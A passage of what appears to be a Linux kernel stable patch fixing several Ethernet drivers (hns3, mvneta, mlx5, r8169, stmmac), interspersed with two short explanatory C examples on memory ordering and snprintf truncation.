+ 			ret = hclge_update_tp_port_info(hdev);
+ 		else
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+index 72cf5145e15a2..5a978ea101a90 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.c
+@@ -1258,6 +1258,8 @@ static int hclgevf_set_vlan_filter(struct hnae3_handle *handle,
+ 	     test_bit(HCLGEVF_STATE_RST_FAIL, &hdev->state)) && is_kill) {
+ 		set_bit(vlan_id, hdev->vlan_del_fail_bmap);
+ 		return -EBUSY;
++	} else if (!is_kill && test_bit(vlan_id, hdev->vlan_del_fail_bmap)) {
++		clear_bit(vlan_id, hdev->vlan_del_fail_bmap);
+ 	}
+ 
+ 	hclgevf_build_send_msg(&send_msg, HCLGE_MBX_SET_VLAN,
+@@ -1285,20 +1287,25 @@ static void hclgevf_sync_vlan_filter(struct hclgevf_dev *hdev)
+ 	int ret, sync_cnt = 0;
+ 	u16 vlan_id;
+ 
++	if (bitmap_empty(hdev->vlan_del_fail_bmap, VLAN_N_VID))
++		return;
++
++	rtnl_lock();
+ 	vlan_id = find_first_bit(hdev->vlan_del_fail_bmap, VLAN_N_VID);
+ 	while (vlan_id != VLAN_N_VID) {
+ 		ret = hclgevf_set_vlan_filter(handle, htons(ETH_P_8021Q),
+ 					      vlan_id, true);
+ 		if (ret)
+-			return;
++			break;
+ 
+ 		clear_bit(vlan_id, hdev->vlan_del_fail_bmap);
+ 		sync_cnt++;
+ 		if (sync_cnt >= HCLGEVF_MAX_SYNC_COUNT)
+-			return;
++			break;
+ 
+ 		vlan_id = find_first_bit(hdev->vlan_del_fail_bmap, VLAN_N_VID);
+ 	}
++	rtnl_unlock();
+ }
+ 
+ static int hclgevf_en_hw_strip_rxvtag(struct hnae3_handle *handle, bool enable)
+@@ -2028,8 +2035,18 @@ static enum hclgevf_evt_cause hclgevf_check_evt_cause(struct hclgevf_dev *hdev,
+ 	return HCLGEVF_VECTOR0_EVENT_OTHER;
+ }
+ 
++static void hclgevf_reset_timer(struct timer_list *t)
++{
++	struct hclgevf_dev *hdev = from_timer(hdev, t, reset_timer);
++
++	hclgevf_clear_event_cause(hdev, HCLGEVF_VECTOR0_EVENT_RST);
++	hclgevf_reset_task_schedule(hdev);
++}
++
+ static irqreturn_t hclgevf_misc_irq_handle(int irq, void *data)
+ {
++#define HCLGEVF_RESET_DELAY	5
++
+ 	enum hclgevf_evt_cause event_cause;
+ 	struct hclgevf_dev *hdev = data;
+ 	u32 clearval;
+@@ -2041,7 +2058,8 @@ static irqreturn_t hclgevf_misc_irq_handle(int irq, void *data)
+ 
+ 	switch (event_cause) {
+ 	case HCLGEVF_VECTOR0_EVENT_RST:
+-		hclgevf_reset_task_schedule(hdev);
++		mod_timer(&hdev->reset_timer,
++			  jiffies + msecs_to_jiffies(HCLGEVF_RESET_DELAY));
+ 		break;
+ 	case HCLGEVF_VECTOR0_EVENT_MBX:
+ 		hclgevf_mbx_handler(hdev);
+@@ -2987,6 +3005,7 @@ static int hclgevf_init_hdev(struct hclgevf_dev *hdev)
+ 		 HCLGEVF_DRIVER_NAME);
+ 
+ 	hclgevf_task_schedule(hdev, round_jiffies_relative(HZ));
++	timer_setup(&hdev->reset_timer, hclgevf_reset_timer, 0);
+ 
+ 	return 0;
+ 
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+index 59ca6c794d6db..d65ace07b4569 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_main.h
+@@ -219,6 +219,7 @@ struct hclgevf_dev {
+ 	enum hnae3_reset_type reset_level;
+ 	unsigned long reset_pending;
+ 	enum hnae3_reset_type reset_type;
++	struct timer_list reset_timer;
+ 
+ #define HCLGEVF_RESET_REQUESTED		0
+ #define HCLGEVF_RESET_PENDING		1
+diff --git a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c
+index bbf7b14079de3..85c2a634c8f96 100644
+--- a/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c
++++ b/drivers/net/ethernet/hisilicon/hns3/hns3vf/hclgevf_mbx.c
+@@ -63,6 +63,9 @@ static int hclgevf_get_mbx_resp(struct hclgevf_dev *hdev, u16 code0, u16 code1,
+ 		i++;
+ 	}
+ 
++	/* ensure additional_info will be seen after received_resp */
++	smp_rmb();
++
+ 	if (i >= HCLGEVF_MAX_TRY_TIMES) {
+ 		dev_err(&hdev->pdev->dev,
+ 			"VF could not get mbx(%u,%u) resp(=%d) from PF in %d tries\n",
+@@ -178,6 +181,10 @@ static void hclgevf_handle_mbx_response(struct hclgevf_dev *hdev,
+ 	resp->resp_status = hclgevf_resp_to_errno(resp_status);
+ 	memcpy(resp->additional_info, req->msg.resp_data,
+ 	       HCLGE_MBX_MAX_RESP_DATA_SIZE * sizeof(u8));
++
++	/* ensure additional_info will be seen before setting received_resp */
++	smp_wmb();
++
+ 	if (match_id) {
+ 		/* If match_id is not zero, it means PF support match_id.
+ 		 * if the match_id is right, VF get the right response, or
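
The smp_wmb()/smp_rmb() pair orders the copy of additional_info against the received_resp flag: the writer publishes the payload before the flag, the reader checks the flag before touching the payload. The portable C11 analogue puts release/acquire semantics on the flag itself (the struct and names are illustrative, not the mailbox layout):

#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>
#include <string.h>

struct resp {
        char additional_info[64];
        atomic_bool received;
};

static void publish(struct resp *r, const char *info, size_t len)
{
        memcpy(r->additional_info, info, len);          /* payload first... */
        atomic_store_explicit(&r->received, true,
                              memory_order_release);    /* ...then the flag */
}

static bool consume(struct resp *r, char *out, size_t len)
{
        if (!atomic_load_explicit(&r->received, memory_order_acquire))
                return false;
        memcpy(out, r->additional_info, len);   /* ordered after the flag */
        return true;
}

int main(void)
{
        static struct resp r;
        char out[8];

        publish(&r, "ok", 3);
        return consume(&r, out, 3) ? 0 : 1;
}
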
+diff --git a/drivers/net/ethernet/marvell/mvneta.c b/drivers/net/ethernet/marvell/mvneta.c
+index aca5b72cfeec6..eb4ebaa1c92ff 100644
+--- a/drivers/net/ethernet/marvell/mvneta.c
++++ b/drivers/net/ethernet/marvell/mvneta.c
+@@ -4730,14 +4730,17 @@ static void mvneta_ethtool_get_strings(struct net_device *netdev, u32 sset,
+ 				       u8 *data)
+ {
+ 	if (sset == ETH_SS_STATS) {
++		struct mvneta_port *pp = netdev_priv(netdev);
+ 		int i;
+ 
+ 		for (i = 0; i < ARRAY_SIZE(mvneta_statistics); i++)
+ 			memcpy(data + i * ETH_GSTRING_LEN,
+ 			       mvneta_statistics[i].name, ETH_GSTRING_LEN);
+ 
+-		data += ETH_GSTRING_LEN * ARRAY_SIZE(mvneta_statistics);
+-		page_pool_ethtool_stats_get_strings(data);
++		if (!pp->bm_priv) {
++			data += ETH_GSTRING_LEN * ARRAY_SIZE(mvneta_statistics);
++			page_pool_ethtool_stats_get_strings(data);
++		}
+ 	}
+ }
+ 
+@@ -4855,8 +4858,10 @@ static void mvneta_ethtool_pp_stats(struct mvneta_port *pp, u64 *data)
+ 	struct page_pool_stats stats = {};
+ 	int i;
+ 
+-	for (i = 0; i < rxq_number; i++)
+-		page_pool_get_stats(pp->rxqs[i].page_pool, &stats);
++	for (i = 0; i < rxq_number; i++) {
++		if (pp->rxqs[i].page_pool)
++			page_pool_get_stats(pp->rxqs[i].page_pool, &stats);
++	}
+ 
+ 	page_pool_ethtool_stats_get(data, &stats);
+ }
+@@ -4872,14 +4877,21 @@ static void mvneta_ethtool_get_stats(struct net_device *dev,
+ 	for (i = 0; i < ARRAY_SIZE(mvneta_statistics); i++)
+ 		*data++ = pp->ethtool_stats[i];
+ 
+-	mvneta_ethtool_pp_stats(pp, data);
++	if (!pp->bm_priv)
++		mvneta_ethtool_pp_stats(pp, data);
+ }
+ 
+ static int mvneta_ethtool_get_sset_count(struct net_device *dev, int sset)
+ {
+-	if (sset == ETH_SS_STATS)
+-		return ARRAY_SIZE(mvneta_statistics) +
+-		       page_pool_ethtool_stats_get_count();
++	if (sset == ETH_SS_STATS) {
++		int count = ARRAY_SIZE(mvneta_statistics);
++		struct mvneta_port *pp = netdev_priv(dev);
++
++		if (!pp->bm_priv)
++			count += page_pool_ethtool_stats_get_count();
++
++		return count;
++	}
+ 
+ 	return -EOPNOTSUPP;
+ }
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+index 1ae15b8536a85..9b1f1369ac4d8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/reporter_rx.c
+@@ -668,11 +668,11 @@ static int mlx5e_rx_reporter_dump(struct devlink_health_reporter *reporter,
+ 
+ void mlx5e_reporter_rx_timeout(struct mlx5e_rq *rq)
+ {
+-	char icosq_str[MLX5E_REPORTER_PER_Q_MAX_LEN] = {};
+ 	char err_str[MLX5E_REPORTER_PER_Q_MAX_LEN];
+ 	struct mlx5e_icosq *icosq = rq->icosq;
+ 	struct mlx5e_priv *priv = rq->priv;
+ 	struct mlx5e_err_ctx err_ctx = {};
++	char icosq_str[32] = {};
+ 
+ 	err_ctx.ctx = rq;
+ 	err_ctx.recover = mlx5e_rx_reporter_timeout_recover;
+@@ -681,7 +681,7 @@ void mlx5e_reporter_rx_timeout(struct mlx5e_rq *rq)
+ 	if (icosq)
+ 		snprintf(icosq_str, sizeof(icosq_str), "ICOSQ: 0x%x, ", icosq->sqn);
+ 	snprintf(err_str, sizeof(err_str),
+-		 "RX timeout on channel: %d, %sRQ: 0x%x, CQ: 0x%x",
++		 "RX timeout on channel: %d, %s RQ: 0x%x, CQ: 0x%x",
+ 		 rq->ix, icosq_str, rq->rqn, rq->cq.mcq.cqn);
+ 
+ 	mlx5e_health_report(priv, priv->rx_reporter, err_str, &err_ctx);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+index 83bb0811e7741..4db0483c066a8 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en/tc_tun.c
+@@ -300,9 +300,6 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
+-	e->encap_size = ipv4_encap_size;
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -322,6 +319,8 @@ int mlx5e_tc_tun_create_header_ipv4(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
++	e->encap_size = ipv4_encap_size;
++	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -404,16 +403,12 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
+-	e->encap_size = ipv4_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto release_neigh;
++		goto free_encap;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -427,6 +422,10 @@ int mlx5e_tc_tun_update_header_ipv4(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
++	e->encap_size = ipv4_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv4_put(&attr);
+@@ -568,9 +567,6 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto destroy_neigh_entry;
+ 
+-	e->encap_size = ipv6_encap_size;
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+@@ -590,6 +586,8 @@ int mlx5e_tc_tun_create_header_ipv6(struct mlx5e_priv *priv,
+ 		goto destroy_neigh_entry;
+ 	}
+ 
++	e->encap_size = ipv6_encap_size;
++	e->encap_header = encap_header;
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
+@@ -671,16 +669,12 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 	if (err)
+ 		goto free_encap;
+ 
+-	e->encap_size = ipv6_encap_size;
+-	kfree(e->encap_header);
+-	e->encap_header = encap_header;
+-
+ 	if (!(nud_state & NUD_VALID)) {
+ 		neigh_event_send(attr.n, NULL);
+ 		/* the encap entry will be made valid on neigh update event
+ 		 * and not used before that.
+ 		 */
+-		goto release_neigh;
++		goto free_encap;
+ 	}
+ 
+ 	memset(&reformat_params, 0, sizeof(reformat_params));
+@@ -694,6 +688,10 @@ int mlx5e_tc_tun_update_header_ipv6(struct mlx5e_priv *priv,
+ 		goto free_encap;
+ 	}
+ 
++	e->encap_size = ipv6_encap_size;
++	kfree(e->encap_header);
++	e->encap_header = encap_header;
++
+ 	e->flags |= MLX5_ENCAP_ENTRY_VALID;
+ 	mlx5e_rep_queue_neigh_stats_work(netdev_priv(attr.out_dev));
+ 	mlx5e_route_lookup_ipv6_put(&attr);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+index 1728e197558d0..eeba91d9c5211 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_ethtool.c
+@@ -43,12 +43,17 @@ void mlx5e_ethtool_get_drvinfo(struct mlx5e_priv *priv,
+ 			       struct ethtool_drvinfo *drvinfo)
+ {
+ 	struct mlx5_core_dev *mdev = priv->mdev;
++	int count;
+ 
+ 	strscpy(drvinfo->driver, KBUILD_MODNAME, sizeof(drvinfo->driver));
+-	snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+-		 "%d.%d.%04d (%.16s)",
+-		 fw_rev_maj(mdev), fw_rev_min(mdev), fw_rev_sub(mdev),
+-		 mdev->board_id);
++	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
++	if (count == sizeof(drvinfo->fw_version))
++		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev));
++
+ 	strscpy(drvinfo->bus_info, dev_name(mdev->device),
+ 		sizeof(drvinfo->bus_info));
+ }
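
snprintf() returns the length the untruncated string would have needed, so a return value that reaches the buffer size signals truncation; the hunk then reformats without the board id. The general idiom, using >= (which also covers returns larger than the buffer):

#include <stdio.h>

static void fmt_fw_version(char *buf, size_t size,
                           int maj, int min, int sub, const char *board)
{
        int n = snprintf(buf, size, "%d.%d.%04d (%.16s)",
                         maj, min, sub, board);

        if (n >= (int)size)     /* truncated: drop the board id */
                snprintf(buf, size, "%d.%d.%04d", maj, min, sub);
}

int main(void)
{
        char buf[16];

        fmt_fw_version(buf, sizeof(buf), 22, 36, 1010, "MT_0000000222");
        printf("%s\n", buf);    /* falls back to "22.36.1010" */
        return 0;
}
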
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+index bd895ef341a0b..2653cb96c3105 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_rep.c
+@@ -69,13 +69,17 @@ static void mlx5e_rep_get_drvinfo(struct net_device *dev,
+ {
+ 	struct mlx5e_priv *priv = netdev_priv(dev);
+ 	struct mlx5_core_dev *mdev = priv->mdev;
++	int count;
+ 
+ 	strscpy(drvinfo->driver, mlx5e_rep_driver_name,
+ 		sizeof(drvinfo->driver));
+-	snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
+-		 "%d.%d.%04d (%.16s)",
+-		 fw_rev_maj(mdev), fw_rev_min(mdev),
+-		 fw_rev_sub(mdev), mdev->board_id);
++	count = snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d (%.16s)", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev), mdev->board_id);
++	if (count == sizeof(drvinfo->fw_version))
++		snprintf(drvinfo->fw_version, sizeof(drvinfo->fw_version),
++			 "%d.%d.%04d", fw_rev_maj(mdev),
++			 fw_rev_min(mdev), fw_rev_sub(mdev));
+ }
+ 
+ static const struct counter_desc sw_rep_stats_desc[] = {
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+index 7ab489520a873..43239555f7850 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/en_tc.c
+@@ -3102,7 +3102,7 @@ static struct mlx5_fields fields[] = {
+ 	OFFLOAD(DIPV6_31_0,   32, U32_MAX, ip6.daddr.s6_addr32[3], 0,
+ 		dst_ipv4_dst_ipv6.ipv6_layout.ipv6[12]),
+ 	OFFLOAD(IPV6_HOPLIMIT, 8,  U8_MAX, ip6.hop_limit, 0, ttl_hoplimit),
+-	OFFLOAD(IP_DSCP, 16,  0xc00f, ip6, 0, ip_dscp),
++	OFFLOAD(IP_DSCP, 16,  0x0fc0, ip6, 0, ip_dscp),
+ 
+ 	OFFLOAD(TCP_SPORT, 16, U16_MAX, tcp.source,  0, tcp_sport),
+ 	OFFLOAD(TCP_DPORT, 16, U16_MAX, tcp.dest,    0, tcp_dport),
+@@ -3113,21 +3113,31 @@ static struct mlx5_fields fields[] = {
+ 	OFFLOAD(UDP_DPORT, 16, U16_MAX, udp.dest,   0, udp_dport),
+ };
+ 
+-static unsigned long mask_to_le(unsigned long mask, int size)
++static u32 mask_field_get(void *mask, struct mlx5_fields *f)
+ {
+-	__be32 mask_be32;
+-	__be16 mask_be16;
+-
+-	if (size == 32) {
+-		mask_be32 = (__force __be32)(mask);
+-		mask = (__force unsigned long)cpu_to_le32(be32_to_cpu(mask_be32));
+-	} else if (size == 16) {
+-		mask_be32 = (__force __be32)(mask);
+-		mask_be16 = *(__be16 *)&mask_be32;
+-		mask = (__force unsigned long)cpu_to_le16(be16_to_cpu(mask_be16));
++	switch (f->field_bsize) {
++	case 32:
++		return be32_to_cpu(*(__be32 *)mask) & f->field_mask;
++	case 16:
++		return be16_to_cpu(*(__be16 *)mask) & (u16)f->field_mask;
++	default:
++		return *(u8 *)mask & (u8)f->field_mask;
+ 	}
++}
+ 
+-	return mask;
++static void mask_field_clear(void *mask, struct mlx5_fields *f)
++{
++	switch (f->field_bsize) {
++	case 32:
++		*(__be32 *)mask &= ~cpu_to_be32(f->field_mask);
++		break;
++	case 16:
++		*(__be16 *)mask &= ~cpu_to_be16((u16)f->field_mask);
++		break;
++	default:
++		*(u8 *)mask &= ~(u8)f->field_mask;
++		break;
++	}
+ }
+ 
+ static int offload_pedit_fields(struct mlx5e_priv *priv,
+@@ -3139,11 +3149,12 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 	struct pedit_headers *set_masks, *add_masks, *set_vals, *add_vals;
+ 	struct pedit_headers_action *hdrs = parse_attr->hdrs;
+ 	void *headers_c, *headers_v, *action, *vals_p;
+-	u32 *s_masks_p, *a_masks_p, s_mask, a_mask;
+ 	struct mlx5e_tc_mod_hdr_acts *mod_acts;
+-	unsigned long mask, field_mask;
++	void *s_masks_p, *a_masks_p;
+ 	int i, first, last, next_z;
+ 	struct mlx5_fields *f;
++	unsigned long mask;
++	u32 s_mask, a_mask;
+ 	u8 cmd;
+ 
+ 	mod_acts = &parse_attr->mod_hdr_acts;
+@@ -3159,15 +3170,11 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 		bool skip;
+ 
+ 		f = &fields[i];
+-		/* avoid seeing bits set from previous iterations */
+-		s_mask = 0;
+-		a_mask = 0;
+-
+ 		s_masks_p = (void *)set_masks + f->offset;
+ 		a_masks_p = (void *)add_masks + f->offset;
+ 
+-		s_mask = *s_masks_p & f->field_mask;
+-		a_mask = *a_masks_p & f->field_mask;
++		s_mask = mask_field_get(s_masks_p, f);
++		a_mask = mask_field_get(a_masks_p, f);
+ 
+ 		if (!s_mask && !a_mask) /* nothing to offload here */
+ 			continue;
+@@ -3194,22 +3201,20 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 					 match_mask, f->field_bsize))
+ 				skip = true;
+ 			/* clear to denote we consumed this field */
+-			*s_masks_p &= ~f->field_mask;
++			mask_field_clear(s_masks_p, f);
+ 		} else {
+ 			cmd  = MLX5_ACTION_TYPE_ADD;
+ 			mask = a_mask;
+ 			vals_p = (void *)add_vals + f->offset;
+ 			/* add 0 is no change */
+-			if ((*(u32 *)vals_p & f->field_mask) == 0)
++			if (!mask_field_get(vals_p, f))
+ 				skip = true;
+ 			/* clear to denote we consumed this field */
+-			*a_masks_p &= ~f->field_mask;
++			mask_field_clear(a_masks_p, f);
+ 		}
+ 		if (skip)
+ 			continue;
+ 
+-		mask = mask_to_le(mask, f->field_bsize);
+-
+ 		first = find_first_bit(&mask, f->field_bsize);
+ 		next_z = find_next_zero_bit(&mask, f->field_bsize, first);
+ 		last  = find_last_bit(&mask, f->field_bsize);
+@@ -3236,10 +3241,9 @@ static int offload_pedit_fields(struct mlx5e_priv *priv,
+ 		MLX5_SET(set_action_in, action, field, f->field);
+ 
+ 		if (cmd == MLX5_ACTION_TYPE_SET) {
++			unsigned long field_mask = f->field_mask;
+ 			int start;
+ 
+-			field_mask = mask_to_le(f->field_mask, f->field_bsize);
+-
+ 			/* if field is bit sized it can start not from first bit */
+ 			start = find_first_bit(&field_mask, f->field_bsize);
+ 
+diff --git a/drivers/net/ethernet/realtek/r8169_main.c b/drivers/net/ethernet/realtek/r8169_main.c
+index d14706265d9cb..770391cefb4e4 100644
+--- a/drivers/net/ethernet/realtek/r8169_main.c
++++ b/drivers/net/ethernet/realtek/r8169_main.c
+@@ -614,6 +614,7 @@ struct rtl8169_private {
+ 
+ 	unsigned supports_gmii:1;
+ 	unsigned aspm_manageable:1;
++	unsigned dash_enabled:1;
+ 	dma_addr_t counters_phys_addr;
+ 	struct rtl8169_counters *counters;
+ 	struct rtl8169_tc_offsets tc_offset;
+@@ -1186,14 +1187,26 @@ static bool r8168ep_check_dash(struct rtl8169_private *tp)
+ 	return r8168ep_ocp_read(tp, 0x128) & BIT(0);
+ }
+ 
+-static enum rtl_dash_type rtl_check_dash(struct rtl8169_private *tp)
++static bool rtl_dash_is_enabled(struct rtl8169_private *tp)
++{
++	switch (tp->dash_type) {
++	case RTL_DASH_DP:
++		return r8168dp_check_dash(tp);
++	case RTL_DASH_EP:
++		return r8168ep_check_dash(tp);
++	default:
++		return false;
++	}
++}
++
++static enum rtl_dash_type rtl_get_dash_type(struct rtl8169_private *tp)
+ {
+ 	switch (tp->mac_version) {
+ 	case RTL_GIGA_MAC_VER_28:
+ 	case RTL_GIGA_MAC_VER_31:
+-		return r8168dp_check_dash(tp) ? RTL_DASH_DP : RTL_DASH_NONE;
++		return RTL_DASH_DP;
+ 	case RTL_GIGA_MAC_VER_51 ... RTL_GIGA_MAC_VER_53:
+-		return r8168ep_check_dash(tp) ? RTL_DASH_EP : RTL_DASH_NONE;
++		return RTL_DASH_EP;
+ 	default:
+ 		return RTL_DASH_NONE;
+ 	}
+@@ -1383,7 +1396,7 @@ static void __rtl8169_set_wol(struct rtl8169_private *tp, u32 wolopts)
+ 
+ 	device_set_wakeup_enable(tp_to_dev(tp), wolopts);
+ 
+-	if (tp->dash_type == RTL_DASH_NONE) {
++	if (!tp->dash_enabled) {
+ 		rtl_set_d3_pll_down(tp, !wolopts);
+ 		tp->dev->wol_enabled = wolopts ? 1 : 0;
+ 	}
+@@ -2442,7 +2455,7 @@ static void rtl_wol_enable_rx(struct rtl8169_private *tp)
+ 
+ static void rtl_prepare_power_down(struct rtl8169_private *tp)
+ {
+-	if (tp->dash_type != RTL_DASH_NONE)
++	if (tp->dash_enabled)
+ 		return;
+ 
+ 	if (tp->mac_version == RTL_GIGA_MAC_VER_32 ||
+@@ -2516,9 +2529,7 @@ static void rtl_set_rx_mode(struct net_device *dev)
+ 		rx_mode &= ~AcceptMulticast;
+ 	} else if (netdev_mc_count(dev) > MC_FILTER_LIMIT ||
+ 		   dev->flags & IFF_ALLMULTI ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_35 ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_46 ||
+-		   tp->mac_version == RTL_GIGA_MAC_VER_48) {
++		   tp->mac_version == RTL_GIGA_MAC_VER_35) {
+ 		/* accept all multicasts */
+ 	} else if (netdev_mc_empty(dev)) {
+ 		rx_mode &= ~AcceptMulticast;
+@@ -4613,10 +4624,16 @@ static void rtl8169_down(struct rtl8169_private *tp)
+ 	rtl8169_cleanup(tp);
+ 	rtl_disable_exit_l1(tp);
+ 	rtl_prepare_power_down(tp);
++
++	if (tp->dash_type != RTL_DASH_NONE)
++		rtl8168_driver_stop(tp);
+ }
+ 
+ static void rtl8169_up(struct rtl8169_private *tp)
+ {
++	if (tp->dash_type != RTL_DASH_NONE)
++		rtl8168_driver_start(tp);
++
+ 	pci_set_master(tp->pci_dev);
+ 	phy_init_hw(tp->phydev);
+ 	phy_resume(tp->phydev);
+@@ -4834,7 +4851,7 @@ static int rtl8169_runtime_idle(struct device *device)
+ {
+ 	struct rtl8169_private *tp = dev_get_drvdata(device);
+ 
+-	if (tp->dash_type != RTL_DASH_NONE)
++	if (tp->dash_enabled)
+ 		return -EBUSY;
+ 
+ 	if (!netif_running(tp->dev) || !netif_carrier_ok(tp->dev))
+@@ -4860,8 +4877,7 @@ static void rtl_shutdown(struct pci_dev *pdev)
+ 	/* Restore original MAC address */
+ 	rtl_rar_set(tp, tp->dev->perm_addr);
+ 
+-	if (system_state == SYSTEM_POWER_OFF &&
+-	    tp->dash_type == RTL_DASH_NONE) {
++	if (system_state == SYSTEM_POWER_OFF && !tp->dash_enabled) {
+ 		pci_wake_from_d3(pdev, tp->saved_wolopts);
+ 		pci_set_power_state(pdev, PCI_D3hot);
+ 	}
+@@ -5217,7 +5233,8 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 		rc = pci_disable_link_state(pdev, PCIE_LINK_STATE_L1);
+ 	tp->aspm_manageable = !rc;
+ 
+-	tp->dash_type = rtl_check_dash(tp);
++	tp->dash_type = rtl_get_dash_type(tp);
++	tp->dash_enabled = rtl_dash_is_enabled(tp);
+ 
+ 	tp->cp_cmd = RTL_R16(tp, CPlusCmd) & CPCMD_MASK;
+ 
+@@ -5287,7 +5304,7 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* configure chip for default features */
+ 	rtl8169_set_features(dev, dev->features);
+ 
+-	if (tp->dash_type == RTL_DASH_NONE) {
++	if (!tp->dash_enabled) {
+ 		rtl_set_d3_pll_down(tp, true);
+ 	} else {
+ 		rtl_set_d3_pll_down(tp, false);
+@@ -5327,7 +5344,8 @@ static int rtl_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 			    "ok" : "ko");
+ 
+ 	if (tp->dash_type != RTL_DASH_NONE) {
+-		netdev_info(dev, "DASH enabled\n");
++		netdev_info(dev, "DASH %s\n",
++			    tp->dash_enabled ? "enabled" : "disabled");
+ 		rtl8168_driver_start(tp);
+ 	}
+ 
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 1559a4dafd413..9f76c2f7d513b 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -5198,6 +5198,7 @@ static int stmmac_rx(struct stmmac_priv *priv, int limit, u32 queue)
+ 
+ 	dma_dir = page_pool_get_dma_dir(rx_q->page_pool);
+ 	buf_sz = DIV_ROUND_UP(priv->dma_conf.dma_buf_sz, PAGE_SIZE) * PAGE_SIZE;
++	limit = min(priv->dma_conf.dma_rx_size - 1, (unsigned int)limit);
+ 
+ 	if (netif_msg_rx_status(priv)) {
+ 		void *rx_head;
+@@ -5233,10 +5234,10 @@ static int stmmac_rx(struct stmmac_priv *priv, int limit, u32 queue)
+ 			len = 0;
+ 		}
+ 
++read_again:
